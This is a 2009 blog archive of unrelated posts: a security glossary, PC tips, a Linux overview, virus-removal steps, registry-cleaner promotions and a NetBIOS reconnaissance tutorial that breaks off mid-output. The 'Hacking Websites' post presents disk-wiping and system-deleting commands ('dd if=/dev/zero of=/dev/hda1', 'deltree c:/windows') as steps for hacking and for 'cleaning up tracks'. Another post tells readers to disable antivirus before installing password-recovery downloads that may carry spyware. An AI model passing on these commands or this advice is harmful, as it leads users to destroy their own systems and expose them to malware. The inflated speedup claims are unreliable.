Tuesday, May 5, 2009

Internet Security Glossary

ARPAnet The precursor to the Internet, ARPAnet was a large wide-area network created by the United States Defense Advanced Research Project Agency (ARPA). Established in 1969, ARPAnet served as a testbed for new networking technologies, linking many universities and research centers. The first two nodes that formed the ARPAnet were UCLA and the Stanford Research Institute, followed shortly thereafter by the University of Utah.attack An action conducted by an adversary, the attacker, on a potential victim. (From the glossary of State of the Practice of Intrusion Detection Technologies.)backdoor Also called a trapdoor. An undocumented way of gaining access to a program, online service or an entire computer system. The backdoor is written by the programmer who creates the code for the program. It is often only known by the programmer. A backdoor is a potential security risk.backup Copy of files and programs made to facilitate recovery, if necessary. (From the National Information Systems Security (INFOSEC) Glossary.)brute force Refers to a programming style that does not include any shortcuts to improve performance, but instead relies on sheer computing power to try all possibilities until the solution to a problem is found. A classic example is the traveling salesman problem (TSP). Suppose a salesman needs to visit 10 cities across the country. How does one determine the order in which cities should be visited such that the total distance traveled is minimized? The brute force solution is simply to calculate the total distance for every possible route and then select the shortest one. This is not particularly efficient because it is possible to eliminate many possible routes through clever algorithms.
Although brute force programming is not particularly elegant, it does have a legitimate place in software engineering. Since brute force methods always return the correct result -- albeit slowly -- they are useful for testing the accuracy of faster algorithms. In addition, sometimes a particular problem can bebug An error or defect in software or hardware that causes a program to malfunction. According to folklore, the first computer bug was an actual bug. Discovered in 1945 at Harvard, a moth trapped between two electrical relays of the Mark II Aiken Relay Calculator caused the whole machine to shut down.cable modem A modem designed to operate over cable TV lines. Because the coaxial cable used by cable TV provides much greater bandwidth than telephone lines, a cable modem can be used to achieve extremely fast access to the World Wide Web. This, combined with the fact that millions of homes are already wired for cable TV, has made the cable modem something of a holy grail for Internet and cable TV companies.
There are a number of technical difficulties, however. One is that the cable TV infrastructure is designed to broadcast TV signals in just one direction - from the cable TV company to people's homes. The Internet, however, is a two-way system where data also needs to flow from the client to the server. In addition, it is still unknown whether the cable TV networks can handle the traffic that would ensue if millions of users began using the system for Internet access.
Despite these problems, cable modems that offer speeds up to 2 Mbps are already available in many areas.DoS Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers. download To copy data (usually an entire file) from a main source to a peripheral device. The term is often used to describe the process of copying a file from an online service or bulletin board service (BBS) to one's own computer. Downloading can also refer to copying a file from a network file server to a computer on the network.
In addition, the term is used to describe the process of loading a font into a laser printer. The font is first copied from a disk to the printer's local memory. A font that has been downloaded like this is called a soft font to distinguish it from the hard fonts that are permanently in the printer's memory.
The opposite of download is upload, which means to copy a file from your own computer to another computer.dsl modem Refers collectively to all types of digital subscriber lines, the two main categories being ADSL and SDSL. Two other types of xDSL technologies are High-data-rate DSL (HDSL) and Very high DSL (VDSL).
DSL technologies use sophisticated modulation schemes to pack data onto copper wires. They are sometimes referred to as last-mile technologies because they are used only for connections from a telephone switching station to a home or office, not between switching stations.
xDSL is similar to ISDN inasmuch as both operate over existing copper telephone lines (POTS) and both require the short runs to a central telephone office (usually less than 20,000 feet). However, xDSL offers much higher speeds - up to 32 Mbps for downstream traffic, and from 32 Kbps to over 1 Mbps for upstream traffic.e-commerce Conducting business on-line. This includes, for example, buying and selling products with digital cash and via Electronic Data Interchange (EDI).e-mail Short for electronic mail, the transmission of messages over communications networks. The messages can be notes entered from the keyboard or electronic files stored on disk. Most mainframes, minicomputers, and computer networks have an e-mail system. Some electronic-mail systems are confined to a single computer system or network, but others have gateways to other computer systems, enabling users to send electronic mail anywhere in the world. Companies that are fully computerized make extensive use of e-mail because it is fast, flexible, and reliable.
Most e-mail systems include a rudimentary text editor for composing messages, but many allow you to edit your messages using any editor you want. You then send the message to the recipient by specifying the recipient's address. You can also send the same message to several users at once. This is called broadcasting.
Sent messages are stored in electronic mailboxes until the recipient fetches them. To see if you have any mail, you may have to check your electronic mailbox periodically, although many systems alert you when mail is received. After reading your mail, you can store it in a text file, forward it to other users, or delete it. Copies of memos can be printed out on a printer if you want a paper copy.
All online services and Internet Service Providers (ISPs) offer e-mail, and most also support gateways so that you can exchange mail with users of other systems.
Usually, it takes only a few seconds or minutes for mail to arrive at its destination. This is a particularly effective way to communicate with a group because you can broadcast a message or document to everyone in the group at once.
Although different e-mail systems use different formats, there are some emerging standards that are making it possible for users on all systems to exchange messages. In the PC world, an important e-mail standard is MAPI. The CCITT standards organization has developed the X.400 standard, which attempts to provide a universal way of addressing messages. To date, though, the de facto addressing standard is the one used by the Internet system because almost all e-mail systems have an Internet gateway.
Another common spelling for e-mail is email.encryption The translation of data into a secret code. Encryption is the most effective way to achieve data security. To read an encrypted file, you must have access to a secret key or password that enables you to decrypt it. Unencrypted data is called plain text; encrypted data is referred to as cipher text.
There are two main types of encryption: asymmetric encryption (also called public-key encryption) and symmetric encryption.firewall A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
There are several types of firewall techniques:
Packet filter: Looks at each packet entering or leaving the network and accepts or rejects it based on user-defined rules. Packet filtering is fairly effective and transparent to users, but it is difficult to configure. In addition, it is susceptible to IP spoofing.
Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.
Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.
In practice, many firewalls use two or more of these techniques in concert.
A firewall is considered a first line of defense in protecting private information. For greater security, data can be encrypted.heuristics Of or relating to exploratory problem-solving techniques that utilize self-educating techniques (as the evaluation of feedback) to improve performance. (From Merriam-Webster Online.)Internet A global network connecting millions of computers. More than 100 countries are linked into exchanges of data, news and opinions.
Unlike online services, which are centrally controlled, the Internet is decentralized by design. Each Internet computer, called a host, is independent. Its operators can choose which Internet services to use and which local services to make available to the global Internet community. Remarkably, this anarchy by design works exceedingly well.
There are a variety of ways to access the Internet. Most online services, such as American Online, offer access to some Internet services. It is also possible to gain access through a commercial Internet Service Provider (ISP).
The Internet is not synonymous with World Wide Web.instant messaging A type of communications service that enables you to create a private chat room with another individual. Typically, the instant messaging system alerts you whenever somebody on your private list is online. You can then initiate a chat session with that particular individual.
There are several competing instant messaging systems. Unfortunately, there's no standard, so anyone you want to send instant messages to must use the same instant messaging system that you use.intruder An adversary who is conducting or has conducted an intrusion or attack against a victim host, site, network or organization. Since the label of intruder is assigned by the victim of the intrusion and is therefore contingent on the victim’s definition of encroachment, there can be no ubiquitous categorization of actions as being intrusive or not. From the victim’s viewpoint, an intruder is usually an entity (person or organization) that has successfully attacked the victim. It is unclear whether one who conducts an unsuccessful attack is an intruder. If an intrusion is required to be an intruder, then it seems that all intruders are attackers, but all attackers are not necessarily intruders. (From the glossary of State of the Practice of Intrusion Detection Technologies.)media Objects on which data can be stored. These include hard disks, floppy disks, CD-ROMs and tapes.operating system The most important program that runs on a computer. Every general-purpose computer must have an operating system to run other programs. Operating systems perform basic tasks, such as recognizing input from the keyboard, sending output to the display screen, keeping track of files and directories on the disk, and controlling peripheral devices such as disk drives and printers.
For large systems, the operating system has even greater responsibilities and powers. It is like a traffic cop -- it makes sure that different programs and users running at the same time do not interfere with each other. The operating system is also responsible for security, ensuring that unauthorized users do not access the system.
Operating systems can be classified as follows:
multi-user: Allows two or more users to run programs at the same time. Some operating systems permit hundreds or even thousands of concurrent users.
multiprocessing: Supports running a program on more than one CPU.
multitasking: Allows more than one program to run concurrently.
multithreading: Allows different parts of a single program to run concurrently.
real time: Responds to input instantly. General-purpose operating systems, such as DOS and UNIX, are not real-time.
Operating systems provide a software platform on top of which other programs, called application programs, can run. The application programs must be written to run on top of a particular operating system. Your choice of operating system, therefore, determines to a great extent the applications you can run. For PCs, the most popular operating systems are DOS, OS/2, and Windows, but others are available, such as Linux.
As a user, you normally interact with the operating system through a set of commands. For example, the DOS operating system contains commands such as COPY and RENAME for copying files and changing the names of files, respectively. The commands are accepted and executed by a part of the operating system called the command processor or command line interpreter. Graphical user interfaces allow you to enter commands by pointing and clicking at objects that appear on the screen.packet A piece of a message transmitted over a packet-switching network. See under packet switching. One of the key features of a packet is that it contains the destination address in addition to the data. In IP networks, packets are often called datagrams.password A secret series of characters that enables a user to access a file, computer, or program. On multi-user systems, each user must enter his or her password before the computer will respond to commands. The password helps ensure that unauthorized users do not access the computer. In addition, data files and programs may require a password.
Ideally, the password should be something that nobody could guess. In practice, most people choose a password that is easy to remember, such as their name or their initials. This is one reason it is relatively easy to break into most computer systems.patch A temporary fix to a program bug. A patch is an actual piece of object code that is inserted into (patched into) an executable program.port In TCP/IP and UDP networks, an endpoint to a logical connection. The port number identifies what type of port it is. For example, port 80 is used for HTTP traffic. Also see Well-Known TCP Port Numbers.smtp Short for Simple Mail Transfer Protocol, a protocol for sending e-mail messages between servers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server to another; the messages can then be retrieved with an e-mail client. sniffing A program and/or device that monitors data traveling over a network. Sniffers can be used both for legitimate network management functions and for stealing information off a network. Unauthorized sniffers can be extremely dangerous to a network's security because they are virtually impossible to detect and can be inserted almost anywhere. This makes them a favorite weapon in the hacker's arsenal.
On TCP/IP networks, where they sniff packets, they're often called packet sniffers.social engineering Social engineering is the art and science of getting people to comply to your wishes. It is not a way of mind control, it will not allow you to get people to perform tasks wildly outside of their normal behavior and it is far from foolproof. (From http://packetstormsecurity.nl/docs/social-engineering/aaatalk.html )spoofing Unauthorized use of legitimate Identification and Authentication data, however, it was obtained, to mimic a subject different from the attacker. Impersonating, masquerading, piggybacking, and mimicking are forms of spoofing. (From the National Information Systems Security (INFOSEC) Glossary.)stateful inspection Also referred to as dynamic packet filtering. Stateful inspection is a firewall architecture that works at the network layer. Unlike static packet filtering, which examines a packet based on the information in its header, stateful inspection tracks each connection traversing all interfaces of the firewall and makes sure they are valid. An example of a stateful firewall may examine not just the header information but also the contents of the packet up through the application layer in order to determine more about the packet than just information about its source and destination. A stateful inspection firewall also monitors the state of the connection and compiles the information in a state table. Because of this, filtering decisions are based not only on administrator-defined rules (as in static packet filtering) but also on context that has been established by prior packets that have passed through the firewall.
As an added security measure against port scanning, stateful inspection firewalls close off ports until connection to the specific port is requested.
Check Point Software is credited with coining the term stateful inspection in the use of its FireWall-1 in 1993.vulnerability A feature or combination of features of a system that allows an adversary – the intruder – to place the system – your home computer – in a state that is both contrary to the desires of the people responsible for the system – you! – and increases the risk (probability or consequence) of undesirable behavior in or of the system. A feature of combination of features of a system that prevents the successful implementation of a particular security policy for that system. A program with a buffer that can be overflowed with data supplied by the invoker will usually be considered a vulnerability. A telephone procedure that provides private information about the caller without prior authentication will usually be considered to have a vulnerability.worm A program or algorithm that replicates itself over a computer network and usually performs malicious actions, such as using up the computer's resources and possibly shutting the system down. Also see virus.
©2000-2004 by SurferBeware.com™. All rights reserved.

Top 10 Tips to Keep Your Computer Hacker Free

10. Subscribe to our newsletter. It will keep you up-to-date on how to protect yourself from the latest attacks and threats in the Internet world.
9. Test your firewall regularly. Especially after any software updates. Test you Firewall here: Firewall Testing.
8. Copy your services file and test "stripping" it down to just the basics. You should only need ftp, telnet, pop3, and the routed services, but test it out. Win 95/98 - C:\WINDOWS\SERVICESWin NT/2K- C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICESMac OS X - /etc/services
7. If you don't have a home network setup then turn off the following services: File and Print Sharing for Microsoft NetworksClient Services for Microsoft NetworksInstructions: Win 95/98 Win NT
6. Use Security Zones
5. Disable Active X and Javascript in your browser by going to Tools/Internet Options/Security, click the Internet icon, then click the Custom Level button and set your preferences for ActiveX and Scripting.
4. Disable HTML e-mails and scripting in your e-mail client. This is an option in your e-mail properties. If you are unsure how to do it, open your client and do a search in help and follow the instructions. HTML is the code that "runs" or displays web pages. It is possible that malevolent code is a-lurkin' in that purty e-mail.
3. If the option is available, press the lock button on your high-speed modem if you will not be accessing the Internet for an extended period of time.
2. Keep Software Up-to-dateWindowsInternet Explorer or your browser (same as above)Outlook or your e-mail clientMacsNetscapeSoftware Firewall
NOTE: Microsoft never sends updates via e-mail. If you get an e-mail claiming to hold a Microsoft update, do not open it. Trash it.
1. Get a firewall! I recommend either of these products:Norton Internet Security 2003Norton Personal Firewall 2003

What is Linux?

Linux starts here
Linux (pronounced LIH-nuks) is an operating system for computers, comparable to Windows or Mac OS X. It was originally created starting in 1991 by Finnish programmer Linus (pronounced LEE-nus) Torvalds with the assistance of developers from around the globe. Linux resembles Unix, an earlier operating system, but unlike Unix, Linux is both Free Software and open source software -- that is, you can not only download and run it on your computer, but also download all the source code the programmers created to build the operating system. You can then modify or extend the code to meet your needs.
Linux runs on a wide variety of hardware platforms, from huge mainframes to desktop PCs to cell phones. It is licensed under the Free Software Foundation's GNU Project's GNU General Public License, version 2, which lets users modify and redistribute the software.
You can think of Linux as having two parts -- a kernel, which is the basic interface between the hardware and other system software, and the functions that run on top of it, such as a graphical user interface (GUI) and application programs.
About Linux.com
Linux.com did not create and does not sell Linux. We simply write about Linux and other open source software. We're part of SourceForge, Inc., which also maintains SourceForge.net and Slashdot.
No single company sells Linux. Because it's open source software, anyone can package Linux with some programs and utilities and distribute it. The different "flavors" of Linux are called distributions. You can get information about some of the most popular distributions from our distributions page. A comprehensive resource for distributions is DistroWatch.com.
Many Linux distributions are designed to be installed on your computer's hard drive, either as a sole operating system, or in a dual boot configuration with another OS, which lets you choose which operating system to run every time you start your computer. Others are designed to run as live CDs that boot from removable media -- typically CDs, but there are also live DVD distributions, and even ones that boot from diskettes and USB storage media. Live distributions can be useful because they let you run a different operating system without affecting any of the contents of your hard drive.
If you're a Windows user to whom Linux is completely new, trying it out might sound daunting. For you we explain in a separate article how you can test Linux without altering your Windows computer, how to install Linux while preserving all of your Windows programs and files, and how to choose what Linux flavor suits your needs best.The Linux desktop
Part of what makes Linux useful on your computer is its graphical user interface. The GUI gives Linux a "look and feel" with clickable icons and widgets, as well as screen borders, scroll bars, and menus that the user can manipulate and customize. This "point and click" environment makes the operating system more intuitive by presenting interface options in an attractive visual layout that doesn't require knowledge of textual commands. Without the GUI, Linux (or any operating system) requires users to type commands in a procedure that is known as the Command Line Interface (CLI).
While most operating systems don't let you choose the user interface you want, Linux gives you a choice of several. Most of them are more than just graphical interfaces -- they are truly complete desktop environments that come with tools, utilities, games, and other applications to make the user's computing experience a richer one. Two of the most popular desktop environments that work with Linux are KDE and GNOME.
KDE stands for K Desktop Environment. KDE runs on any Unix operating system, including Linux. All of the source code for KDE is licensed under the terms of the GNU General Public License, which means that anyone can access and change KDE to suit specific purposes. KDE comes packaged with most Linux distributions and includes standardized menus, toolbars, and color schemes, as well as a complete help system, networking tools, graphics and multimedia applications, and a complete office productivity solution, and dozens of other software tools. The entire KDE project is supported by the free software development community and is provided to Linux users at no cost.
GNOME (pronounced guh-NOME), the GNU Network Object Model Environment, is another ubiquitous GUI or desktop environment for Linux. It is also licensed under the terms of the GNU General Public License, which means it is freely available, along with the source code, for use on any Unix-based operating system. GNOME comes packaged with just about every Linux distribution. It is a part of the GNU project, which created the GNU operating system, parts of which are included with all standard Linux distributions.
Like KDE, the GNOME desktop environment includes more than just toolbars, icons and menus. Help files, networking tools, games, and productivity applications like GNOME Office round out the free software offering.
Other GUIs that work with Linux include:
XPDE desktop environment - "tries to make it easier for Windows XP users to use a Linux box."
Xfce - "lightweight desktop environment for various *NIX systems. Designed for productivity, it loads and executes applications fast, while conserving system resources."
Enlightenment - "advanced graphical libraries, tools, and environments."
IceWM - "The goal of IceWM is speed, simplicity, and not getting in the user's way."
Blackbox - "Blackbox is the fast, lightweight window manager for the X Window System you have been looking for, without all those annoying library dependencies."
Window Maker - "Window Maker is an X11 window manager originally designed to provide integration support for the GNUstep Desktop Environment."
FluxBox - "A fast compact window manager based on the Blackbox, but offering more features."The command line
One thing all the desktop environments have in common is that they let users access Linux commands; you don't have to use a mouse to perform every operation. It may be faster and easier to perform some operations by typing in one or more commands, as users used to have to do on PCs under DOS 20 years ago.
Each desktop environment has a different way to get to a command prompt. Often, you'll open a window that lets you type commands. In GNOME, that application is called GNOME Terminal; in KDE, it's Konsole.
We've prepared a brief introduction to the command line. A good site for further learning is LinuxCommand.org.Desktop applications
Like any operating system, Linux supports a wide range of desktop applications. Typical programs include those for email, office software, playing music and video, personal information management, network communications such as instant messaging and Internet Relay Chat, and file sharing.Gaming
Linux is no stranger to gaming. Linux distributions almost always include games; the GNOME Games package, for example, features 16 arcade and puzzle games, and the KDE Games Center includes games from the arcade, board, card, dice, logic, strategy, and toy genres. If the distributions don't contain what you're looking for, you can turn to commercial sites such as Linux Game Publishing and Tux Games, or you can buy games directly from small companies, independent publishers, and bedroom coders. If games designed for Microsoft Windows or home gaming systems are what you're after, several available emulators may be able to help. For more information on the numerous games available to Linux users and how to obtain them, see Enjoying games with GNU/Linux.This is not the end
Coming soon, we'll be adding to this document to talk about different categories of desktop and server applications, programming tools, training, and support. We welcome your input on what you think new Linux users should know about. If you are a new Linux user with a question, please ask it in our forums.

Monday, May 4, 2009

Hacking Websites: Fun or Terror?

With a proper understanding of the relevant programming languages such as C, C++, Pearl, java etc. one can be fully equipped with the technique of hacking into website. There backdoors for the web hackers for website hacking. For hacking web sites one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from.

window.google_render_ad();
Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).
Cyber Terrorism And Hacker's GroupThe whole planet is today terrorized by the web hackers to whom hacking seems a mode of getting pleasure by the way of gaining knowledge or mere entertainment. A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at a time. The hackers in this case had replaced with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind". This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption.Similarly an educational site on the mad cow disease was defaced along with some cities and the nation's government sites in England. The Alaskan office of the department of interior was once attacked since the secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wild Life Refugee for sucking out oil. The common wealth of Australia is of no exception. The search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use simple techniques and methods to do these. website hacking for these hackers is all as simple as a child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

Hacking Linux : Programmers test themselves

Since Microsoft has a huge chunk of the operating system's market in the world, it is the first victim of hackers. But that doesn't mean that Linux hacking doesn't exist. Although is less common than it's close sourced companion, there are several reasons why hackers try to hack machines with Linux.

window.google_render_ad();
Many corporations use Linux as their server on the web as it is cheaper and easier to deploy. Its security is also better when compared to Microsoft operating systems. No wonder that network hacking tools for this open source operating system have proliferated in the last years.

Secure, managed engineering access

Secure, managed engineering accessDesigned for NERC Cybersecurity standards
Note: CrossBow was formally known as IED Anywhere 2
Benefits -->
Remote, transparent access to IEDs, from any software application
Preserves investment in legacy gateway devices and communication infrastructure
Meets NERC CIP-002-1 through CIP-009-1 requirements for security:
Strong (2-factor) authentication
Active Directory support
Individual user accounts
Comprehensive NERC CIP compliance reports
Audit log
WAN or Dial-up access
Administration interface allows management of thousands of IEDs and hundreds of users

Thursday, April 30, 2009

Youtube Downloader HD - Free Youtube High Definition Video Downloader

Download Youtube HD Video Downloader

usb port disabel

Free USB Drive Disabler is a FREE program lets you disable USB ports on your computer so that no one can steal your precious data through pen drives, removable pen drive, memory card and other portable drives.
USB Drive disabler protects USB ports on your computer when you are away, however your USB ports will not be disabled completely as your USB mouse and keyword will keep working. It will disable the USB storage medium only which includes pen drive, ipod, removable drives and other portable USB mass storage devices.

This is quite handy and portable program to use to block USB drives on your computer, you will need to run the tool to disable USB ports on the computer where you want to disable the USB Drive use.
If in any case you want to block the ports on a remote computer on your LAN network then you can use USB Blocker reviewed previously. But for a local computer this program is the best free utility which can stop people from stealing your data.



Use of this small utility is quite simple as you just need to run the program and select the radio button option Disable USB Drives or Enable USB Pen Drives and click Apply.
This program is supported to run on windows xp, 2003 and vista and completely portable tool which can be run from a portable pen drive.
Download USB Drive Disabler


window.google_rende

AppRemover

AppRemover is really very effective in removing the anti spyware and anti virus programs but on the other hand it cannot remove other softwares and programs on your computer.
Note: AppRemover is supported to run on Both Windows Vista and XP
Download AppRemover

How to Remove Hacked by godzilla virus in 5 minutes

Some other symptoms:
1. Task manager is disabled.
2. Regedit (Command for registry edit) is disabled.
3. Folder options got disappeared From windows explorer.
4. Double clicking on any of your system drive( c: ,d: etc) initiates a new instance of the virus.
So, you won’t be able to open any of your drive by double click rather you have to open then by right click >> explore.
5. msconfig command is disabled - this virus is not dependent on system startup but it disables the msconfig command used to modify the system startup programs.
Let’s see how you can remove Godzilla virus in 5 minutes. Read more:

Follow the Step by step procedure given below to remove hacked by godzilla virus.
window.google_render_ad();
1. First download process explorer ,run it and end all the process which are running as wscript.exe
2. Download RRT.exe (Remove restrictions tool)
You may be wondering..what is RRT?
So for your FYI: RRT (Remove Restrictions Tool) v.1.0 is a tiny tool that does the work for AVs, it re-Enables all what the virus had disabled, and brings every thing including task manager ,regedit ,msconfig and hidden folder options back.
3. now, you have regedit command enabled.
Browse to Go to HKEY_LOCAL_MACHINE \Software \Microsoft \Windows \Current Version \Run and delete MS32DLL (right click on it and select delete)
Go to HKEY_CURRENT_USER \Software \Microsoft \Internet Explorer \Main and delete “Window Title” which has it’s value of “Hacked by Godzilla“ or you can also write your name as a recognition for yourself.
4. Open My Computer,File menu go to Tools -> Folder Options, click on View tab
Under Advance settings, check “Show Hidden files and folders“, uncheck “Hide extensions for known file types“, uncheck “Hide protected operating system files (Recommended)” and click “OK” button
5. now right click on each of your drive and click explore now delete the files with names autorun.inf and MS32DLL.dll.vbs including your USB Drive
6. Restart your PC and your PC should be clean from Hacked by Godzilla.
Leave your comments if you have any issues in following the above procedure.

Block/Unblock sites without software

You can block or even unblock sites without any software. Just follow these steps and you can continue acessing the file.
Go to Start >>> RUN .
Type C:\WINDOWS\system32\drivers\etc
Open the file "HOSTS" in a notepad
Under "127.0.0.1 localhost" . Add IP NameIP - IP of the site to be blockedName - Name of the site (see the pic below for example Example :127.0.0.1 localhost210.210.19.82 www.sifymall.comSifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.

Identify a virus email

You are would able to make out an email virus from their SUBJECT. Most of them contains anunsusal word, such as below:Weah ^_^ :))Hokki=)Hi :)ello!=))Hello -:))Hey, dude, it's me ^_^access MpegRe:your textRe:Text messageRe:Msg replyRe:Is that your document?Re:Hot Movie(MPEG)Re:Sexy picsRe:Information...Re;Important infoRe:This is your photos!:)and more on sex, softwares or just reply messagesIf you received emails with the subject as above, you should delete it immediately.Also dont open any mail in your spam folder even if it's by your friend coz it could that his comp has been infected by virus and that virus is sending mass mails. Although you could open a mail in you spam box if you are expecting one but double check the id and subject. in Gmail if you just hover your mouse over the id it displays the complete id.Make use of the spam filter provided by your email provider.
var somediv=document.getElementById("noselecttext")
disableSelection(somediv) //disable text selection within DIV with id="mydiv"
yahooBuzzArticleHeadline = "Identify a virus email";
yahooBuzzArticleType = "text";
yahooBuzzArticleId = window.location.href;
Buzz up!

Recover lost Yahoo pssword

if you have ever used yahoo messenger on your comp. then you will get your password back. Though not 100% there is a very very high change. You can use one of the below software to recover your password.In case you have recently formated your system then chances of recovery seems to be very less.These are IM pssword recovary softwares.Trial downloads, only 4 chars reveledSpyware free !00% safe
MessenPass 1.16
Instant Messengers Password Recovery Master
Advanced Instant Messengers Password Recovery 3.4 Rapidshare downloads, no guarantee given may contain spyware and virus
Yahoo.Messenger.Password.Note you need to turn off your antivirus(AV) before installing it as it may be considered as spyware by your AV.

5 Best Ways to Speed Up your PC fom akash

5 Best Ways to Speed Up your PC


Are you fed up with your slow PC? Well you can Speed Up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I ’ll split this post into 2 parts.
1. Automatic Ways to Speed Up PC (Using PC Speed Up Softwares)
2. Manual Ways to Speed Up PC
Automatic Ways to Speed Up PC
You can use a PC Optimizer Tool to automatically boost the Speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix upto 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the start up etc. This can speed up your PC and Internet speed by upto 3 times. Here are some of the best PC Optimizer Programs that I recommend.
1. Perfect Optimizer
2. Registry Easy
Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.
Manual Ways to Speed Up Your PC
1. Free Up Disk Space to increase the speed of your PC
Remove temporary Internet files.
Empty the Recycle Bin.
Remove Windows temporary files.
Uninstall Programs that you no longer use.
2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.
3. Clean Up your Registry (Highly Recommended)
Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately you cannot do this manually. You have to use a Registry Cleaner to do this. Here is the best registry cleaner on the web.
Registry Easy
A complete review of registry cleaners can be found at Registry Cleaner Reviews
4. Clean Up the browser cache to Speed Up your Internet.
5. Install a good Antispyware software
Spywares can really hurt the performance of your PC. So, install a good anti-spyware to protect your PC from spywares and improve the speed of your PC. I recommend the following Antispywares to protect your PC.
1. Spyware Cease
2. Nodware Anti-Spyware
Which is the Best Way to Speed Up my PC? (Auto or Manual)
The best way to speed Up your PC is by using a PC Optimizer such as Perfect Optimizer or Registry Easy. This is because, manual ways can only perform 30-40% of the tweaks to improve the speed of your PC, but the most important aspect of the Speed Up process such as Registry clean Up and other advanced performance tweaks can only be done using a PC Optimizer software. So if you are serious about improving the speed of your PC, then you need to use a PC Optimizer.

-: Computer Viruses :-

-: Computer Viruses :-What is a Computer Virus ?A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Types of viruses :- The different types of viruses are as follows-1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.Examples of boot- sector viruses are Michelangelo and Stoned.2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .Some common file viruses are Sunday, Cascade.3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector. This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated. Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.Other examples are Invader, Flip, etc.4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

-: NetBIOS Hacking :-

-: NetBIOS Hacking :-NetBIOS stands for "Network Basic Input Output System". It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.By default it runs on port 139.NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!The NBTSTAT Command :-NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP. All the attributes (switches) used with nbtstat command and their usage can be viewed.At the command prompt type-
C:\Windows>nbtstat Sample NBTSTAT Response :-
C:\>nbtstat -A 117.200.160.174NetBIOS Remote Machine Name Table
Name

Type
Status
----------------------------------------------
PRASANNA
<00>
UNIQUE
Registered
INSECURE LABS
<00>
GROUP
Registered
PRASANNA
<03>
UNIQUE
Registered
PRASANNA
<20>
UNIQUE
Registered
INSECURE LABS
<1e>
GROUP
RegisteredMAC Address = 86-95-55-50-00-00An intruder could use the output from an nbtstat against your machines to begin gathering information about them."<03> in above table is nothing but the username of that system."The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.Here is an example of the Net View command-
C:\>net view \\117.200.160.174Shared resources at \\117.200.160.174
Sharename
Type
Comment
----------------------------------------
C
Disk
Drive C:\
MySofts
Disk
My Softwares Collection
E
Disk
